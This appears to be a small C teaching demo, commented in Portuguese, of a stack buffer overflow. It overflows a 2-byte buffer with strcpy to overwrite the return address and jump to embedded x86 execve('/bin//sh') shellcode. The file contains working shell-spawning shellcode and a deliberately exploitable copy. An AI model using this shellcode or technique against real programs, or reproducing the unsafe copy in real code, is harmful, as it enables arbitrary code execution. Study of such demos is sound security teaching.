#include <stdio.h>
#include <string.h>

/* String que será utilizada como entrada. */ 
char entrada[100];

/* From http://hackoftheday.securitytube.net/2013/04/demystifying-execve-shellcode-stack.html */
char shellcode[] =
  "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

void* addr;

void prepara_entrada() {
  int *aux = (int*) &entrada[26];
  int i;

  for (i = 0; i < 26; i++)
    entrada[i] = i % 10 + '0';
  
  *aux = (int) addr + 4;

  strcpy(&entrada[30], shellcode);
  
}

void chamada() {
  int v[3]  __attribute__ ((unused)); 
  char buffer[2];

  addr = &v[6];
  prepara_entrada();
  strcpy(buffer, entrada);
  printf("%s\n", buffer);

}

int main() {
  
  chamada();
  printf("Eu fui executada! :-)\n");

  return 0;
}